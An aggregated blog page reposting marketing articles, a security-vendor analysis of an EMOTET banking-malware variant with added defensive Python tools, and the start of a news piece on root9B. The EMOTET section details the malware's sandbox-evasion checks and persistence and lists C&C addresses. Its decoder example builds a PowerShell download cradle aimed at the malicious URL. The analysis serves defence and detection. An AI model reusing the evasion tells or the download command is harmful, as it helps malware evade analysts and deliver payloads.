No Comment Diary

The News Without Comment


How to Increase Profits by Analyzing Your Competition

How well do you know your competition?

Depending on your industry or location, the market may be saturated with businesses providing the same services or offering the same products as your company does.

Not everyone will survive.

Sooner or later, one or two companies will separate themselves from the crowd.

If you want to be an expert in your niche, you’ll need to learn effective competitor analysis skills.

Otherwise, you could put yourself at risk of falling behind those businesses that adopt these strategies first.

As a marketing expert who founded several startup companies, I’m well aware of how competitive certain spaces can be.

It’s not easy to operate a business, especially when you’re worried about the guy down the street taking customers away from you.

Whether you’re a small-town business or a global ecommerce store, you need to analyze your competition.

If you’ve never done this before, I’ll show you how to get started.

My techniques will help you improve your business and increase profits fast.

Identify your competitors

Knowing your competitors may sound obvious to you, but you’d be surprised how many people I meet can’t name their competitors.

Those of you who fall into this category have to identify your top competitors before you do anything else.

Even if you know who your competition is, it won’t hurt to start here. You may find new information.

Let’s say you’re a local business selling sandwiches in Seattle.

Run a search on Yelp:


Simple.

The top results will be advertisements, but that doesn’t mean those aren’t your competitors.

Don’t disregard them completely just yet.

Here’s something else to keep in mind.

You’re looking only for your direct competition.

If your sandwich shop also sells cookies or pies, you’re not looking for bakeries or specialty dessert shops.

You’re also not competing with every bar in your neighborhood that has a sandwich on the menu.

Make sense?

So filter your search to get more accurate results:


If you click on the “all filters” tab, you can narrow the results.

For this example, I’d recommend picking a price range similar to yours and a place in the same neighborhood.

If your most expensive menu item is $12, you don’t care about the gourmet restaurant 8 miles away selling $45 sirloin steak sandwiches on their dinner menu.

Now that you’ve got a more accurate list, write down your top competitors.

In a busy city, like Seattle, you may find upward of 30 sandwich shops in your neighborhood alone.

That’s way too many.

Look for businesses with the most reviews and the highest ratings.

Narrow that list down to 5 or 10 at most.

Yelp isn’t your only resource.

Depending on your business, you can also reference Google Local or Angie’s List.

However, these platforms may not be helpful if you’re trying to identify competitors in a digital marketplace.

If your operations are run completely through a blog, website, or ecommerce store, you’ll need to use other tools to identify your competitors.

Try using a service like SimilarWeb:


They offer lots of competitor analysis tools, including competitor identification.

All you need to do is put in the name of your website, and they’ll generate a list of your competitors.

They have a free sign-up option, but to maximize your research, I would recommend paying for an upgraded subscription.

If you don’t want to pay for a subscription, consider reaching out to your current customers.

Creating an effective customer survey can help you learn more about their habits.

Send a survey to your subscriber list asking them to identify other websites they shop at or blogs they read.

Who is their target audience?

Now that you’ve identified your top competitors, it’s time for you to see whom they are targeting.

You can’t assume their target market is the same as yours.

Don’t believe me?

Let’s continue with the local sandwiches example.

Here’s a chain sandwich shop called Cheba Hut:


Take a look at the names of the sandwiches on their menu.

Also, notice how they refer to their different sizes.

Based on your research, you may have identified this company as a top competitor.

They have the same hours as you; they’re close to you; and they sell sandwiches at the same price point.

But it’s clear this business is trying to appeal to a certain crowd.

It works.

Don’t get me wrong.

I’m not saying you need to adopt this strategy and look for a niche market to focus your marketing strategy on.

All I’m saying is you need to identify the target market of your top competitors.

After further analysis, you may determine you want to make some adjustments, but we’re not quite there yet.

Here are some things to consider when you’re identifying your competition’s target audience:

  • Age
  • Location
  • Income
  • Gender
  • Marital status

Your results won’t be perfect, but try to come up with an accurate customer profile based on their advertising campaigns.

Your Google ranking is essential

How can you be better than your competitors?

You both have the same type of content on your website.

You’re targeting the same customers.

They even update their site, services, and products as frequently as you do.

Why are they ranked so much higher on a Google search than you are?

You need to understand the components of Google’s ranking algorithm:


Visit your competitors’ websites.

Evaluate their SEO.

Determine how they are using keywords to boost their search ranking.

Look for keywords and phrases in the following places on their sites:

  • Page titles (title tags)
  • H1 headings
  • H2 headings
  • Internal links
  • URL structure
  • Content

Do you notice a pattern?

See what words are getting used the most in these places.

It may have an impact on their rankings.

Compare their content to the keywords on your site.

Are you using long-tail keywords?


You should be.

Incorporating a long-tail strategy into your content creation will improve your ranking because it’s more specific.

Ecommerce sites use this tactic all the time to get more hits.

If you’re selling a pillow, adding the word “pillow” all throughout your content isn’t as effective as using terms like “down pillow for side sleepers.”

Is your competition using this strategy?

If so, that’s probably why they’re outranking you in related search results.

Analyze competitor content

Take your analysis one step further.

Getting customers to your platform is only half the battle.

But what do these people see once they arrive?

Here are some other things to look for on your competitor’s page:

  • Blogs
  • Pictures
  • Videos
  • Case studies
  • Buying guides
  • FAQ pages
  • Podcasts
  • Guest posts
  • CTA

Compare these to your own website.

They may have certain features you’ve omitted from your site.

I’m not saying you should automatically mimic the structure of their pages, but see what’s working for them.

For example, let’s say you discover your top three competitors have a blog. And all three outrank you on Google.

You should consider adding a blog to your site.


This data about the benefits of blogging speaks for itself.

Adding a blog to your website will help you:

  1. Generate more leads
  2. Increase conversions
  3. Get more inbound links
  4. Have more indexed pages
  5. Gain trust from consumers

And that will lead to increased profits.

Something else to keep an eye on while you’re analyzing their website is their calls to action.

How is your competition adding subscribers, generating leads, or converting sales?

Look at their sales pitches.

See what benefits they are offering.

How do their top features compare to yours?

You may realize your product and service are significantly better than those of your competition.

But that doesn’t mean anything if you can’t relay that information to your customers.

Look at how marketers are failing to use CTAs:


Reviewing the CTA on your competition’s website could be an eye-opening experience for your marketing department.

Your competitors may excel in areas where you’re lacking.

That’s okay for now. But it needs to be fixed before you fall too far behind.

Look at their social media presence

All businesses should have a presence on social media platforms.

For now, I’m going to assume your company is active on at least some of the most popular platforms:

  • Facebook
  • Twitter
  • YouTube
  • Instagram

If not, you need to follow my social media guide.

For those of you who already have profiles set up, navigate to your competitors’ pages.

How active are they?

What are they posting?

Are their customers engaged with their posts, photos, videos, and comments?

Here’s an idea.

Start adding their followers.

These people are obviously interested in your industry if they are following your competitors.

Maybe they don’t know your company exists.

Don’t be selective. Add all of them.

The more people you add, the greater your chances of getting customers to follow you back will be.

Understand why consumers follow brands on social media:


Once they start following you, it’s essential you keep them engaged.

Keep in mind, some of these people may have already established a brand loyalty with your competition.

You really need to blow them away to convince them your brand is better.

See what kind of promotions your competitors are running on social media.

Try to run one that’s more appealing.

How do they incorporate videos into their social media marketing strategy?

Video content makes up more than 90% of Internet traffic.

You should be using live video to engage with your customers.

Even if that’s something your competition isn’t doing, it’s a great way to stay ahead of them.

Recognize areas needing improvement

Now that you’ve analyzed your competitors’ customers, websites, marketing strategies, and social platforms, it’s time to adjust your business.

Based on your research, what areas of your business need improvement?

Where do your competitors excel while you struggle?

There’s always room for improvement. Don’t be biased.

It’s okay to recognize your competitors are doing well.

Run a SWOT analysis:


Here are some questions to ask yourself.

Strengths

  • What are you doing well?
  • How have you separated yourself from the competition?
  • What makes your company unique?

Weaknesses

  • What do you need to improve to compete with your top competitors?
  • What resources or tools do you need to achieve that?
  • Do you need to change your location or conversion method?

Opportunities

  • What is the current public perception of your company?
  • How can you target new customers based on your competition’s strategy?
  • Are there any new changes in the industry or market?

Threats

  • Which competitors are directly impacting your revenue?
  • What’s preventing you from improving your business?
  • How are you leaving yourself vulnerable to losing customers?

These questions are just a starting point.

You can take this SWOT analysis much further to make the necessary changes and improvements.

Conclusion

If you want to increase profits, start by analyzing your competition.

Competitor analysis is an effective strategy for businesses in all industries, whether your company is large, small, or somewhere in the middle.

The first thing you need to do is identify your top competitors.

Narrow this list down to 5 or 10 at the most.

Only look for direct competitors—not just any business similar to yours.

Once you’ve identified these companies, you need to focus on their customers.

What’s their target market?

How are they appealing to these customers?

Focus on your Google ranking:


Analyze your competition’s website to see what kind of SEO tactics they’re using.

Review their content, and compare it to your own.

What pages on their site generate the most user engagement?

Consider adding a blog to your website if you don’t have one already.

Check out the social media profiles of your top competitors.

Start adding their followers in an attempt to draw more customers to your business.

Use the SWOT analysis to recognize and implement any necessary changes.

Making these changes can help improve your business and increase profits.

Which online tools will you use to identify the top 5 direct competitors in your industry?

Source: http://ift.tt/UU7LJr



5 Interactive Content Myths That Are Holding Your Content Strategy Back

No matter what challenges we face in life, there are always a million reasons why it might be easier to give up than persevere.

Humans are creatures of comfort – and getting out of our comfort zone has a tendency to scare us. This holds true in both our personal and professional lives, which is precisely why it’s often easier to stick with what we’ve always done rather than try out a new plan of attack.

Too often, we let our fears or the myths we’ve heard from others discourage us from diving into the latest trend or process. One of the biggest campaign trends in recent years has centered on creating interactive content. All of the world’s most successful brands, from Nike to Netflix, have been utilizing interactive content in order to drive engagement and increase brand awareness. But many of the smaller brands have been scared.

Just because you’re not a big multinational company doesn’t mean you should let fear or perceived obstacles hold you back. I’ve compiled five of the biggest myths about interactive content and plan to bust them in this post to prove that you can succeed with interactive content, no matter what roadblocks you may think are in your way.

MYTH #1: ‘It’s too expensive’

While it is indeed easy to sink your whole marketing budget into an overly elaborate interactive campaign, it’s definitely not essential! You can incorporate interactive content into your marketing plan today with very little investment.

Thanks to advances in software and platforms, you won’t need to sacrifice quality either. There are many options available for all kinds of businesses and budgets. International marketing trainer and speaker Michael Leander refers to affordable interactive options as ‘little apps’.

“Little apps are solutions that do a very specific thing – you can call it a niche thing – that anyone can implement if they want to,” Leander explains.

So-called ‘little apps’ such as Zembula, Wheelio and Gleam all offer affordable ways to incorporate interactive content into your marketing strategy without breaking the bank. Some of them even come with a free trial, so you can try before you buy and make sure you get the most out of what each one has to offer.

Here is what an experience from Zembula looks like:

MYTH #2: ‘It doesn’t really affect engagement levels’

For marketers, engagement is always the end goal. We know that an increase in engagement equals a boost in brand awareness and customer loyalty.

It’s been proven that interactive content fosters more engagement than static content. In fact, interactive content drives 2x the number of conversions as passive content.

So, why is interactive content more effective at driving conversions? Well, key psychological principles associated with interactive content, such as curiosity and conditioning, ensure that your recipients are neurologically motivated to respond to your call-to-action.

If your brand can figure out how to use interactive content to create a fun experience for your customers, you will not only increase engagement levels, you will also increase brand loyalty.  62% of Millennials, 55% of Generation X and 44% of Baby Boomers say that ‘fun’ is an important factor that impacts their brand loyalty. Brand loyalty, in turn, drives increased revenue from each customer. It’s a win-win!

MYTH #3: ‘Interactive content is just a lot of polls and quizzes’

In certain circles, interactive content has developed a bad reputation as the lazy marketer’s way out. It’s true that today’s customers are getting sick of polls and quizzes. However, there are a lot of different kinds of interactive content that many marketers are just now hearing about.

Stay ahead of the curve and offer unique interactive experiences to keep your customers interested in your content.

While there are many types of interactive content, make sure you pick the format that works best with your campaign goals. You could try your hand at interactive video, calculators or interactive white papers – just remember that whatever you choose, there is likely a software solution to help you.

MYTH #4: ‘It requires a lot of development time’

As busy digital marketers, our time is spread thinner than rice paper. From daily tasks like responding to emails to long-term activities such as boosting engagement, our minds are always torn between 10 different directions at once.

Many marketers shy away from experimenting with interactive content because they’re afraid of the development time associated with such tech-heavy campaigns. Not to fear! One of my favorite tips for saving time is to repurpose an existing campaign by adding an interactive element. It requires little to no creative development hours, and the easy-to-use interface of many interactive programs means it won’t spend forever passing through your development team either!

One way to experiment with this idea is to take a long-form piece of evergreen content that is already developed and pull a couple of pieces of trivia out of it. You can use your preferred strategy, like quizzes or ‘snackable’ reveal experiences, and wrap your trivia in interactivity. For instance, if you have an ebook or white paper, why not make a quiz from the contents? Or, try incorporating swiping, tapping, or scratching on an interactive experience to really make the questions stand out!

These techniques not only create fun, gamified experiences, they take very little time to think up and create.

MYTH #5: ‘It isn’t right for my industry’

Why leave all the fun to the online clothing retailers and the millennial TV networks? Interactive content is suitable for brands of all shapes and sizes! From manufacturing giants to B2B software companies, interactive content can provide a boost in your ROI regardless of your industry.

In fact, check out this example by GoToMeeting, and take a gander at this example by subscription service Bistro MD that got them 20x the conversion rate over their static content.

The bottom line is that you are marketing to people, even if you are a B2B company. The psychology behind the success of interactive content includes curiosity, the endowment effect, and FOMO, to name but a few. These are consistent across the board for all industries. All you need is a little creativity and motivation to create something truly awesome for your brand.

Wrapping up

Now that you know five of the most common myths about interactive content, I hope you’re feeling motivated to try something new and go in with guns blazing. After all, they’re just myths!

Go ahead and make the jump in your marketing campaigns. Interactive content can help you stand out from your competition, create a loyal and engaged customer base, and ultimately increase your bottom line.

Guest Author: Nicole Cordier is a marketing writer for Zembula. A journalism graduate from the University of Oregon, she is a Portland native who loves coloring, dogs and all things outdoors.

The post 5 Interactive Content Myths That Are Holding Your Content Strategy Back appeared first on Jeffbullas’s Blog.

Source: http://ift.tt/im5GqL



New EMOTET Hijacks a Windows API, Evades Sandbox and Analysis

We discussed the re-emergence of the banking malware EMOTET in September and how it had widened its scope, since it is not picky about the industries it attacks. We have now found a new iteration (detected as TSPY_EMOTET.SMD10) with a few changes to its usual behavior and new routines that let it elude sandboxes and malware analysis.

Based on our findings, EMOTET’s dropper has moved from RunPE (process hollowing) to abusing CreateTimerQueueTimer. CreateTimerQueueTimer is a Windows application programming interface (API) that adds a timer to a timer queue; each timer is a lightweight object that runs a caller-supplied callback function on a worker thread when the specified time elapses. The API’s legitimate purpose is to schedule timer routines, but here the callback EMOTET registers is its actual payload. EMOTET appears to have traded RunPE for this API because RunPE has become a popular, widely signatured technique, while callback-based execution is less well known, which in theory makes it harder for security scanners to detect.

Figure 1. The CreateTimerQueueTimer API documentation (from the CreateTimerQueueTimer function reference)

Figure 2. When the EMOTET dropper executes at Stage 4, the Stage 5 payload at 0x428310 is handed to CreateTimerQueueTimer as the timer callback.

This is not the first malware we’ve seen abusing CreateTimerQueueTimer. Hancitor, a downloader that dropped PONY and VAWTRAK, also abused the API in its dropper, a malicious macro document.

Anti-Analysis and Anti-Sandbox Techniques

We also observed a new anti-analysis behavior in this variant. Some malware sleeps for a period of time so that nothing malicious happens while an analysis product is watching; analysis platforms counter this by shortening the sleep period so that the activity falls inside the scan window. EMOTET instead checks for this kind of monitoring to dodge detection, and CreateTimerQueueTimer does the job for it: the routine is re-scheduled every 0x3E8 (1,000) milliseconds through a timer callback rather than a sleep call, so shortening sleeps does not move the malware’s timeline forward.

This variant also checks whether it is inside a sandbox at the second stage of its payload; the EMOTET loader will not proceed if it determines that it is.

The dropper checks for the following to decide whether it is running in a sandbox:

  • When the NetBIOS name is TEQUILABOOMBOOM.
  • When UserName is Wilber, NetBIOS name starts with SC, and NetBIOS name starts with CW.
  • When UserName is admin, DnsHostName is SystemIT, and there is a debugger symbol file such as C:\Symbols\aagmmc.pdb.
  • When UserName is admin and the NetBIOS name is KLONE_X64-PC.
  • When UserName is John Doe.
  • When UserName is John and the two files C:\take_screenshot.ps1 and C:\loaddll.exe exist.
  • When these files are present: C:\email.doc, C:\123\email.doc, and C:\123\email.docx.
  • When these files are present: C:\a\foobar.bmp, C:\a\foobar.doc, and C:\a\foobar.gif.

Figure 3. If the sample file is named sample., mlwr_smple. or artifact.exe, the malicious payload will also not be launched.
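To turn that list into something an analysis-VM owner can actually run, here is an added Python check (example code written for this page, not EMOTET’s or Trend Micro’s) that evaluates the same conditions against a set of host facts and reports which ones your environment would trip. How the facts are gathered on a live host (the USERNAME variable for the user, platform.node() for the NetBIOS name, the FQDN for DnsHostName) is an assumption; the rule for user Wilber treats the two NetBIOS prefixes as alternatives, since a name cannot start with both.

```python
import os
import platform
import socket
from dataclasses import dataclass, field
from typing import Callable, List, Set, Tuple

# Every file path any rule looks for; probed on disk by collect_local_facts().
DECOY_PATHS = (
    r"C:\Symbols\aagmmc.pdb", r"C:\take_screenshot.ps1", r"C:\loaddll.exe",
    r"C:\email.doc", r"C:\123\email.doc", r"C:\123\email.docx",
    r"C:\a\foobar.bmp", r"C:\a\foobar.doc", r"C:\a\foobar.gif",
)


@dataclass
class HostFacts:
    """The host properties the dropper inspects (names follow the list above)."""
    user_name: str = ""
    netbios_name: str = ""
    dns_host_name: str = ""
    sample_name: str = ""                         # file name the sample runs as
    present_files: Set[str] = field(default_factory=set)

    def __post_init__(self) -> None:
        # Windows paths compare case-insensitively, so normalise once.
        self.present_files = {p.lower() for p in self.present_files}

    def has(self, *paths: str) -> bool:
        return all(p.lower() in self.present_files for p in paths)


def _nb_starts(h: HostFacts, *prefixes: str) -> bool:
    return h.netbios_name.upper().startswith(prefixes)


# One (label, predicate) per bullet above, plus the Figure 3 file-name check.
RULES: List[Tuple[str, Callable[[HostFacts], bool]]] = [
    ("NetBIOS TEQUILABOOMBOOM",
     lambda h: h.netbios_name.upper() == "TEQUILABOOMBOOM"),
    # The text gives both prefixes for user Wilber; a name cannot start with
    # both, so they are treated as alternatives here (assumption).
    ("user Wilber, NetBIOS SC*/CW*",
     lambda h: h.user_name == "Wilber" and _nb_starts(h, "SC", "CW")),
    ("user admin, host SystemIT, aagmmc.pdb",
     lambda h: h.user_name == "admin" and h.dns_host_name == "SystemIT"
     and h.has(r"C:\Symbols\aagmmc.pdb")),
    ("user admin, NetBIOS KLONE_X64-PC",
     lambda h: h.user_name == "admin" and h.netbios_name.upper() == "KLONE_X64-PC"),
    ("user John Doe", lambda h: h.user_name == "John Doe"),
    ("user John, screenshot/loaddll files",
     lambda h: h.user_name == "John"
     and h.has(r"C:\take_screenshot.ps1", r"C:\loaddll.exe")),
    ("email.doc decoys",
     lambda h: h.has(r"C:\email.doc", r"C:\123\email.doc", r"C:\123\email.docx")),
    ("foobar decoys",
     lambda h: h.has(r"C:\a\foobar.bmp", r"C:\a\foobar.doc", r"C:\a\foobar.gif")),
    ("sample file name",
     lambda h: h.sample_name.lower().startswith(("sample.", "mlwr_smple."))
     or h.sample_name.lower() == "artifact.exe"),
]


def matched_rules(facts: HostFacts) -> List[str]:
    """Labels of every check the dropper would trip on this host."""
    return [label for label, pred in RULES if pred(facts)]


def looks_like_sandbox(facts: HostFacts) -> bool:
    """True when the loader would refuse to run, per the checks above."""
    return bool(matched_rules(facts))


def collect_local_facts(sample_path: str) -> HostFacts:
    """Gather the same facts from this machine. Assumed mapping: USERNAME for
    the user, platform.node() for the NetBIOS name, the FQDN for DnsHostName."""
    return HostFacts(
        user_name=os.environ.get("USERNAME", ""),
        netbios_name=platform.node(),
        dns_host_name=socket.getfqdn(),
        sample_name=os.path.basename(sample_path),
        present_files={p for p in DECOY_PATHS if os.path.exists(p)},
    )


if __name__ == "__main__":
    import sys
    hits = matched_rules(collect_local_facts(sys.argv[0]))
    print("would be flagged as sandbox:" if hits else "no EMOTET tells found", hits)
```

Run it from inside the analysis VM under the same user and file name you would give a sample; an empty result means none of the tells on this list are present, which says nothing about other families’ checks.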

As part of its unpacking routine, this variant re-launches itself through another process if it does not have admin privileges. If the process does have admin privileges, it proceeds as follows:

  1. Creates a new service set to auto start, to keep the malware persistent.
  2. Changes the service description to “Provides support for 3rd party protocol plug-ins for Internet Connection Sharing.”
  3. Starts the service.
  4. Collects system information such as running process names and system details.
  5. Encrypts the collected information with AES-128, using SHA-1 for hashing.
  6. POSTs the encrypted information to the C&C server.
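A detection angle follows from step 2: that description string is the one Windows uses for its built-in Application Layer Gateway Service (ALG, %SystemRoot%\System32\alg.exe), so any other service carrying it deserves a look. The following Python hunt is an added example, not part of the original post. The sample service records are constructed, the service name netsvcupd is hypothetical, and the live collector’s use of Get-CimInstance Win32_Service through PowerShell is an assumption about how you would pull the data.

```python
import json
import subprocess
from typing import Dict, Iterable, List

# Description the dropper writes into its service. It is the text Windows
# ships for the Application Layer Gateway Service (ALG), image alg.exe.
ALG_DESCRIPTION = ("Provides support for 3rd party protocol plug-ins for "
                   "Internet Connection Sharing")
ALG_IMAGE_SUFFIX = r"\system32\alg.exe"

Service = Dict[str, str]   # keys: Name, Description, PathName, StartMode


def _norm(text: str) -> str:
    """Collapse whitespace, drop a trailing period, lower-case (loose match)."""
    return " ".join((text or "").split()).rstrip(".").lower()


def is_genuine_alg(svc: Service) -> bool:
    path = (svc.get("PathName") or "").strip().strip('"').lower()
    return (svc.get("Name") or "").upper() == "ALG" and path.endswith(ALG_IMAGE_SUFFIX)


def suspicious_services(services: Iterable[Service]) -> List[Service]:
    """Services that carry ALG's description text but are not ALG itself."""
    return [svc for svc in services
            if _norm(svc.get("Description", "")) == _norm(ALG_DESCRIPTION)
            and not is_genuine_alg(svc)]


def live_services() -> List[Service]:
    """Assumed collector: ask PowerShell for every service via CIM as JSON."""
    ps = ("Get-CimInstance Win32_Service | "
          "Select-Object Name,Description,PathName,StartMode | ConvertTo-Json -Compress")
    out = subprocess.run(["powershell", "-NoProfile", "-Command", ps],
                         capture_output=True, text=True, check=True).stdout
    data = json.loads(out)
    return data if isinstance(data, list) else [data]   # one service -> object


# Constructed sample records; "netsvcupd" is a hypothetical name, not an IOC.
SAMPLE_SERVICES: List[Service] = [
    {"Name": "ALG", "Description": ALG_DESCRIPTION,
     "PathName": r"C:\Windows\System32\alg.exe", "StartMode": "Manual"},
    {"Name": "Spooler",
     "Description": "This service spools print jobs and handles interaction with the printer.",
     "PathName": r"C:\Windows\System32\spoolsv.exe", "StartMode": "Auto"},
    {"Name": "netsvcupd", "Description": ALG_DESCRIPTION + ".",
     "PathName": r"C:\Users\Public\netsvcupd.exe", "StartMode": "Auto"},
]

if __name__ == "__main__":
    for svc in suspicious_services(SAMPLE_SERVICES):
        print("suspect:", svc["Name"], svc["PathName"], svc["StartMode"])
```

Matching on the description rather than on a service name is deliberate: the post does not give the name EMOTET chooses, and the description is the one field the text says it copies verbatim. Swap SAMPLE_SERVICES for live_services() on a Windows host to run it for real.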

Figure 4. EMOTET collects system process information (left) and saves the result to memory (right)

Figure 5. EMOTET collects information about the system version and the applications currently running under C:\WOW64

Figure 6. EMOTET C2 IP (red) : port (yellow) list

Infection Chain

Figure 7. The variant’s infection chain

The infection chain of this variant starts with a phishing email. The email contains a malicious URL that delivers a document file containing a malicious macro.

Figure 8. EMOTET phishing email

Figure 9. Malicious EMOTET document

Figure 10. The malicious macro inside the document launches cmd.exe and PowerShell to execute an encoded and obfuscated string.

The command downloads EMOTET from hxxp://bonn-medien[.]de/RfThRpWC/ and executes the dropper PE payload retrieved from that site.
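The macro’s command line is the kind of artifact a triage script can decode. The following Python helper is an added example (not from the original post): it decodes a PowerShell -EncodedCommand argument (base64 of the UTF-16LE script text, which is how PowerShell defines that switch), extracts any URLs, and compares them with a defanged IOC list. The sample command line is constructed here from a one-line download cradle that uses the URL above; the actual obfuscation in EMOTET’s macro is not on the page and is not reproduced.

```python
import base64
import re
from typing import Iterable, List

URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)
# powershell accepts -e, -ec, -en, -enc or the full switch name
ENC_RE = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)",
                    re.IGNORECASE)


def refang(ioc: str) -> str:
    """hxxp://a[.]b/ -> http://a.b/ (inverse of the usual defang notation)."""
    return ioc.replace("hxxp", "http", 1).replace("[.]", ".")


def decode_encoded_command(cmdline: str) -> str:
    """Return the script behind `powershell -EncodedCommand <b64>`, or "" if
    the argument is absent or is not valid base64."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:                      # binascii.Error is a ValueError
        return ""
    return raw.decode("utf-16-le", errors="replace")


def extract_urls(text: str) -> List[str]:
    return URL_RE.findall(text)


def matching_iocs(cmdline: str, defanged_urls: Iterable[str]) -> List[str]:
    """URLs in the decoded command that appear in the defanged IOC list."""
    known = {refang(u).rstrip("/").lower() for u in defanged_urls}
    return [u for u in extract_urls(decode_encoded_command(cmdline))
            if u.rstrip("/").lower() in known]


# Constructed sample: a plain download cradle, encoded the way the macro
# hands it to powershell.exe. The URL is the one from this post, refanged.
IOC_URLS = ["hxxp://bonn-medien[.]de/RfThRpWC/"]
_SCRIPT = ("(New-Object Net.WebClient).DownloadFile('%s', \"$env:TEMP\\up.exe\")"
           % refang(IOC_URLS[0]))
SAMPLE_CMDLINE = ("powershell.exe -NoP -W Hidden -EncodedCommand "
                  + base64.b64encode(_SCRIPT.encode("utf-16-le")).decode("ascii"))

if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_CMDLINE))
    print(matching_iocs(SAMPLE_CMDLINE, IOC_URLS))
```

Feed it the CommandLine field of a process-creation event (Sysmon event 1 or Windows 4688) rather than a hand-built string; the decoder stops at the first non-base64 character, so a command line with trailing arguments still decodes.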

Figure 11. Network traffic of PowerShell downloading the dropper from bonn-medien[.]de/RfThRpWC/

Enterprises and end users can avoid threats like EMOTET by following best practices for defending against phishing. Users should always be cautious of individuals or organizations that ask for personal information; most companies will not ask their customers for sensitive data, and when in doubt, users should verify with the company directly. Users should also avoid clicking links or downloading files even when they come from seemingly “trustworthy” sources. In addition, enterprises can stay protected by applying strong security policies at the email gateway and by ensuring that their network infrastructure can filter, validate, and block malicious traffic such as anomalous data exfiltration.

Trend Micro Solutions

Combating threats like EMOTET calls for a multilayered and proactive approach to security—from the gateway to endpoints, networks, and servers. Trend Micro endpoint solutions such as Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security can protect users and businesses from these threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs. Trend Micro Deep Discovery™ has an email inspection layer that can protect enterprises by detecting malicious attachments and URLs.

Trend Micro™ Hosted Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network. It protects Microsoft Exchange, Microsoft Office 365, Google Apps, and other hosted and on-premises email solutions.

Trend Micro XGen™ security provides a cross-generational blend of threat defense techniques against a full range of threats for data centers, cloud environments, networks, and endpoints. Smart, optimized, and connected, XGen™ powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.

Indicators of Compromise (IoCs)

SHA256:

  • Malicious document (W2KM_POWLOAD.AUSJTM)
    455be9278594633944bfdada541725a55e5ef3b7189ae13be8b311848d473b53
  • Dropper sample (TSPY_EMOTET.SMD10)
    fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec
  • Malicious macro (W2KM_EMOTET.DG)
    3f75ee07639bbcebf9b904debae1b40ae1e2f2cbfcef44caeda21a9dae71c982

Malicious C&Cs

  • 164[.]208[.]152[.]175:8080
  • 66[.]234[.]234[.]36:8080
  • 62[.]210[.]86[.]114:8080
  • 162[.]243[.]154[.]25:443
  • 37[.]187[.]57[.]57:443
  • 94[.]199[.]242[.]92:8080
  • 178[.]254[.]33[.]12:8080
  • 136[.]243[.]202[.]133:8080

C&C public key

-----BEGIN RSA PUBLIC KEY-----
MGcCYDeWo1m4l56rx8uAsn+gsDBAYoJARIdddsLOaiOf4oxe0GGy3IruKSmi
RSMfzj93sIHm88vzhJOeUkLES+RuDXUwSfob8u8bx5TjoSmY2kdmx5rgkp8U
NqD3z+P0m6bAxwIDAQAB
-----END RSA PUBLIC KEY-----
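The key above is a PKCS#1 RSAPublicKey (a DER SEQUENCE of two INTEGERs, modulus then exponent), so a few lines of DER parsing will tell you its size without any third-party library. This is an added example, not Trend Micro’s tooling; the DER walker handles only what this structure needs (short- and long-form lengths, no indefinite lengths), and the key text is copied from the list above.

```python
import base64
import hashlib
from typing import Dict, Tuple

# Key exactly as listed in the IoCs above (PKCS#1 "RSA PUBLIC KEY").
EMOTET_C2_PUBKEY = """-----BEGIN RSA PUBLIC KEY-----
MGcCYDeWo1m4l56rx8uAsn+gsDBAYoJARIdddsLOaiOf4oxe0GGy3IruKSmi
RSMfzj93sIHm88vzhJOeUkLES+RuDXUwSfob8u8bx5TjoSmY2kdmx5rgkp8U
NqD3z+P0m6bAxwIDAQAB
-----END RSA PUBLIC KEY-----"""


def pem_to_der(pem: str) -> bytes:
    body = "".join(l.strip() for l in pem.splitlines() if not l.startswith("-----"))
    return base64.b64decode(body)


def _read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Parse one DER tag-length-value at pos; return (tag, value, next_pos)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: low bits = byte count
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_rsa_public_key(pem: str) -> Tuple[int, int]:
    """Return (modulus, exponent) from a PKCS#1 RSAPublicKey PEM."""
    der = pem_to_der(pem)
    tag, seq, _ = _read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("expected SEQUENCE, got tag 0x%02x" % tag)
    tag_n, n_bytes, pos = _read_tlv(seq, 0)
    tag_e, e_bytes, _ = _read_tlv(seq, pos)
    if tag_n != 0x02 or tag_e != 0x02:
        raise ValueError("expected two INTEGERs")
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def key_summary(pem: str) -> Dict[str, object]:
    """Size, exponent and a DER hash to pivot on across samples."""
    n, e = parse_rsa_public_key(pem)
    return {
        "modulus_bits": n.bit_length(),
        "modulus_bytes": (n.bit_length() + 7) // 8,
        "exponent": e,
        "der_sha256": hashlib.sha256(pem_to_der(pem)).hexdigest(),
    }


if __name__ == "__main__":
    for k, v in key_summary(EMOTET_C2_PUBKEY).items():
        print("%-14s %s" % (k, v))
```

Parsing the key as listed gives e = 65537 and a 96-byte modulus whose value is 766 bits long, i.e. a nominal 768-bit key, far below the 2048 bits treated as a minimum today. The SHA-256 of the DER is a convenient value to search for when checking whether other samples embed the same C&C key.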

 

Post from: Trendlabs Security Intelligence Blog – by Trend Micro


http://ift.tt/2iZ0JB1 Source: http://ift.tt/1amucZ5



R.I.P. root9B, We Hardly Knew Ya!


root9B, a company that many in the security industry consider little more than a big-name startup aimed at cashing in on the stock market’s insatiable appetite for cybersecurity firms, surprised no one this week when it announced it was ceasing operations at the end of the year.

Founded in 2011, Colorado Springs, Colo. based root9B Technologies touted itself as an IT security training firm staffed by an impressive list of ex-military leaders with many years of cybersecurity experience at the Department of Defense and National Security Agency (NSA). As it began to attract more attention from investors, root9B’s focus shifted to helping organizations hunt for cyber intruders within their networks.

By 2015, root9B was announcing lucrative cybersecurity contracts with government agencies and the infusion of millions from investors. The company’s stock was ballooning in price, reaching an all-time high in mid-May 2015.

That was just days after root9B issued a headline-grabbing report about how its cyber intelligence had single-handedly derailed a planned Russian cyber attack on several U.S. financial institutions.

